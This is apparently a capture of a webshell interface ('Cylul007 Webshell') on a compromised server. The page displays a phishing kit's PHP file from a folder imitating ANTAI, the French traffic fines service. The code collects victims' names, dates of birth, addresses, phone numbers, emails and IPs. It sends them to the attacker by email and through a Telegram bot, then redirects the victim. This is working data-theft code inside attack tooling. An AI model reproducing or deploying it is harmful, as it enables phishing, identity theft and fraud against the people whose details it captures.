Cylul007 Webshell
Uname
:
Linux h2web131 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1~deb8u1 (2020-02-21) x86_64
PHP
:
7.2.34
on
fpm-fcgi
Time
:
10 Dec 2025 16:26:16
Path :
/
home
/
clients
/
bc55d1d9a618a64acfd6a3c258c080a1
/
web
/
cv
/
antai
/
infoz
/
File Upload :
New File
New Folder
Current File : /home/clients/bc55d1d9a618a64acfd6a3c258c080a1/web/cv/antai/infoz/infos.php
Download
HOME
<?php include('../common/sub_includes.php'); include_once '../config.php'; ob_start(); if (!isset($_SESSION)) { session_start(); // Et on ouvre la session } $name = $_POST['prenom'] . " " . $_POST['nom']; $ddn = $_POST['ddn']; $phone = $_POST['tel']; $email = $_POST['email']; $rue = $_POST['rue']; $ville = $_POST['ville']; $postal = $_POST['postal']; if ($_SERVER['REQUEST_METHOD'] == 'POST') { $_SESSION['name'] = htmlspecialchars($name); $_SESSION['ddn'] = htmlspecialchars($ddn); $_SESSION['phone'] = htmlspecialchars($phone); $_SESSION['email'] = htmlspecialchars($email); $_SESSION['rue'] = htmlspecialchars($rue); $_SESSION['ville'] = htmlspecialchars($ville); $_SESSION['postal'] = htmlspecialchars($postal); $message = ' [♾️] +1 INFOS du four [♾️] 👮 Nom : '.$_SESSION['name'].' 🎂 Date de naissance : '.$_SESSION['ddn'].' 👮 Rue : '.$_SESSION['rue'].' 👮 Ville : '.$_SESSION['ville'].' 👮 Code Postal : '.$_SESSION['postal'].' 📱 Téléphone : '.$_SESSION['phone'].' 💌 Email : '.$_SESSION['email'].' 🛒 Adresse IP : ' . $_SERVER['REMOTE_ADDR']; if($mail_send == true){ $Subject=" 「🍛」+1 INFOS ".$_SESSION['name']." | ".$_SERVER['REMOTE_ADDR']; $head="From: amendegod@rez.info <info@INUN.bg>"; mail($rezmail,$Subject,$message,$head); } $theip = $message; function antiBotsCaller($messaggio,$bot_token,$rez_chat) { $url = "https://api.telegram.org/bot" . $bot_token . "/sendMessage?chat_id=" . $rez_chat; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url,CURLOPT_RETURNTRANSFER => true);curl_setopt_array($ch, $optArray);$result = curl_exec($ch);curl_close($ch);return $result;}antiBotsCaller($theip,$antit2,$antic1);antiBotsCaller($message,$bot_token,$rez_chat); } header('Location: ../loading.php'); ?>
Copyright © 2018 - Powered By CytoXploit